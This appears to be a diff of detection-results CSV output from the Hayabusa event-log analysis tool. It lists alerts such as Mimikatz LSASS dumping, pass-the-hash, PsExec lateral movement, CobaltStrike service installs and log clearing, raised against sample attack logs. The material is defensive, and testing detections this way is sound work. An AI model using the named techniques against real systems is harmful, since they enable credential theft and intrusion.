+2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4658,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
+2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
+2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
+2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,critical,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
+2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
+2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
+2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
+2021-03-27 01:59:24.880 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx
+2021-03-27 01:59:24.892 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx
+2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:00.305 +09:00,MSEDGEWIN10,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:00.384 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\System32\cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\user03  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 18:27:51.181 +09:00,jump01.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx
+2021-04-21 18:40:32.342 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.42.22  :  Port: 56661  :  LogonID: 0x1375fbd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: PSEXESVC.exe  :  IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: PSEXESVC.exe  :  IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.347 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.42.22  :  Port: 56662  :  LogonID: 0x1375fd8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.42.22  :  Port: 56663  :  LogonID: 0x1375ff5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.42.22  :  Port: 56664  :  LogonID: 0x1376003,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.360 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.42.22  :  Port: 56666  :  LogonID: 0x1376020,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.362 +09:00,srvdefender01.offsec.lan,4674,critical,SCM Database Privileged Operation,,rules/sigma/builtin/security/win_scm_database_privileged_operation.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: cmd.exe  :  IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: cmd.exe  :  IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.529 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 23:56:41.780 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-21 23:56:41.786 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: System32\WindowsPowerShell\v1.0\powershell.exe  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID5145-remote service creation over SMB.evtx
+2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: System32\WindowsPowerShell\v1.0\powershell.exe  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: System32\WindowsPowerShell\v1.0\powershell.exe  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5145-remote shell execution via SMB admin share.evtx
+2021-04-21 23:56:41.897 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx
+2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx
+2021-04-22 17:50:53.614 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x74872,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: 0Konuy9q8HtkWeKS  :  IP Address: 10.23.123.11  :  Port: 41747  :  LogonID: 0x74872,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: FS03VULN$  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: FS03VULN$  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: System32\WindowsPowerShell\v1.0\powershell.exe  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:04.796 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: FS03VULN$  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 60163  :  LogonID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:06.539 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x7777e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:06.554 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 60163  :  LogonID: 0x7777e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: USERS\ADMMIG  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:19.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:19.291 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: USERS\ADMMIG\DESKTOP  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:22.992 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\MS17_010_psexec.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:22.994 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: USERS\ADMMIG\DESKTOP\DESKTOP.INI  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\MS17_010_psexec.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
